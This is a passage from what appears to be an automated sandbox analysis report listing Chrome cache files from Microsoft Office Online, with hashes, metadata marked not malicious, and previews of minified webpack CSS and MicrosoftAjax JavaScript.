                                                        Preview:(globalThis.webpackChunkMicrosoft_Office_OWL=globalThis.webpackChunkMicrosoft_Office_OWL||[]).push([[6720],{64106:function(e,n,t){"use strict";t.d(n,{A:function(){return a}});var o=t(88754),r=t.n(o),i=t(75666),s=t.n(i)()(r());s.push([e.id,".lLFji2JIIWB51LkuYBKM{width:75%;height:75%;position:fixed;top:50%;left:50%;transform:translateY(-50%) translateX(-50%);background-color:#fff;box-sizing:border-box;outline:1px solid transparent;z-index:5;box-shadow:0 0 5px 0 rgba(0,0,0,.4);border:none}","",{version:3,sources:["webpack://./../owl-service/lib/filePicker/filePickerStyles.module.scss"],names:[],mappings:"AAAA,sBACE,SAAA,CACA,UAAA,CACA,cAAA,CACA,OAAA,CACA,QAAA,CACA,2CAAA,CACA,qBAAA,CACA,qBAAA,CACA,6BAAA,CACA,SAAA,CACA,mCAAA,CACA,WAAA",sourcesContent:[".file-picker-iframe {\n width: 75%;\n height: 75%;\n position: fixed;\n top: 50%;\n left: 50%;\n transform: translateY(-50%) translateX(-50%);\n background-color: #fff;\n box-sizing: border-box;\n outline: 1px solid transparent;\n z

                                                        Chrome Cache Entry: 488

                                                        Download File
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):108513
                                                        Entropy (8bit):5.310741046471892
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:77C9684211102D592D9C2E042C24DADE
                                                        SHA1:0A03C6B4E4ED441D584C28DE29EC78B797ED2792
                                                        SHA-256:BCD659260529EA730BA14B8AE4455F7E8BD97CA98FC262CA89A21563D33DA58C
                                                        SHA-512:F5C69F10BAF63ABB1CB67D6BCC9A35C85B3DD2740D5DB88982CD722A7248FADE9DC3CD5E2F0A83F2E50E12471C667D5360390F40F547C9B10D3197286C800899
                                                        Malicious:false
                                                        Reputation:unknown
                                                        URL:https://res-1.cdn.office.net/officeonline/v/s/hBCD659260529EA73_App_Scripts/MicrosoftAjaxDS.js
                                                        Preview:window||(this.window=this),window.Type=Function,window.g_MSAJAXIgnoreXHRZeroStatus=void 0===window.g_MSAJAXIgnoreXHRZeroStatus||window.g_MSAJAXIgnoreXHRZeroStatus,Function.__typeName="Function",Function.__class=!0,Function.createCallback=function(e,t){return function(){var r=arguments.length;if(r>0){for(var n=[],i=0;i<r;i++)n[i]=arguments[i];return n[r]=t,e.apply(this,n)}return e.call(this,t)}},Function.createDelegate=function(e,t){return function(){return t.apply(e,arguments)}},Function.emptyFunction=Function.emptyMethod=function(){},Function.validateParameters=function(e,t,r){return Function._validateParams(e,t,r)},Function._validateParams=function(e,t,r){var n,i=t.length;if(r=r||void 0===r,n=Function._validateParameterCount(e,t,r))return n.popStackFrame(),n;for(var a=0,s=e.length;a<s;a++){var o=t[Math.min(a,i-1)],l=o.name;if(o.parameterArray)l+="["+(a-i+1)+"]";else if(!r&&a>=i)break;if(n=Function._validateParameter(e[a],o,l))return n.popStackFrame(),n}return null},Function._validate

                                                        Static File Info

                                                        No static file info